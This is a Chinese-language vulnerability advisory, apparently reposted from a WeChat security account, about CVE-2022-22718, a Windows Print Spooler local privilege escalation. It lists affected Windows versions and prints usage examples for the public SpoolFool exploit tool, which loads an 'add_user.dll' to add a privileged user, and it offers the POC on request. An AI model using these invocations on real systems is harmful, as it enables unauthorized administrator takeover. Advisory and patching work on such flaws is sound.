影响范围
-
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
-
Windows Server 2008 for x64-based Systems Service Pack 2
-
Windows 7 for 32-bit Systems Service Pack 1
-
Windows Server 2016 (Server Core installation)
-
Windows Server 2016
-
Windows 10 Version 1607 for x64-based Systems
-
Windows 10 Version 1607 for 32-bit Systems
-
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
-
Windows Server 2008 for 32-bit Systems Service Pack 2
-
Windows RT 8.1
-
Windows 8.1 for x64-based systems
-
Windows 8.1 for 32-bit systems
-
Windows 7 for x64-based Systems Service Pack 1
-
Windows 10 for x64-based Systems
-
Windows 10 for 32-bit Systems
-
Windows 10 Version 21H2 for x64-based Systems
-
Windows 10 Version 21H1 for x64-based Systems
-
Windows 10 Version 1909 for ARM64-based Systems
-
Windows 10 Version 1909 for x64-based Systems
-
Windows 10 Version 1909 for 32-bit Systems
-
Windows Server 2012 R2 (Server Core installation)
-
Windows Server 2012 R2
-
Windows Server 2012 (Server Core installation)
-
Windows Server 2012
-
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
-
Windows Server 2008 R2 for x64-based Systems Service Pack 1
-
Windows 10 Version 21H2 for ARM64-based Systems
-
Windows 10 Version 21H2 for 32-bit Systems
-
Windows 11 for ARM64-based Systems
-
Windows 11 for x64-based Systems
-
Windows Server, version 20H2 (Server Core Installation)
-
Windows 10 Version 20H2 for ARM64-based Systems
-
Windows 10 Version 20H2 for 32-bit Systems
-
Windows 10 Version 20H2 for x64-based Systems
-
Windows Server 2022 Azure Edition Core Hotpatch
-
Windows Server 2022 (Server Core installation)
-
Windows Server 2022
-
Windows 10 Version 21H1 for 32-bit Systems
-
Windows 10 Version 21H1 for ARM64-based Systems
-
Windows Server 2019 (Server Core installation)
-
Windows Server 2019
-
Windows 10 Version 1809 for ARM64-based Systems
-
Windows 10 Version 1809 for x64-based Systems
-
Windows 10 Version 1809 for 32-bit Systems
漏洞类型
本地权限提升
利用条件
影响范围应用
漏洞概述
2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7
漏洞复现
使用说明:
PS C:SpoolFool> .SpoolFool.exeSpoolFoolBy Oliver Lyak (@ly4k_)Examples:C:SpoolFoolSpoolFool.exe -dll add_user.dllC:SpoolFoolSpoolFool.exe -dll add_user.dll -printer 'My Printer'C:SpoolFoolSpoolFool.exe -dll add_user.dll -dir 'SECRET'C:SpoolFoolSpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
powershell:
PS C:SpoolFool> ipmo .SpoolFool.ps1PS C:SpoolFool> Invoke-SpoolFoolSpoolFoolBy Oliver Lyak (@ly4k_)Examples:-dll add_user.dll-dll add_user.dll -printer 'My Printer'-dll add_user.dll -dir 'SECRET'-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
安全建议
升级到最新版本~
后台回复"Print Spooler",获取POC
后台回复"Print Spooler",获取POC
后台回复"Print Spooler",获取POC
原文始发于微信公众号(七芒星实验室):CVE-2022-22718:Windows Print Spooler提权
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论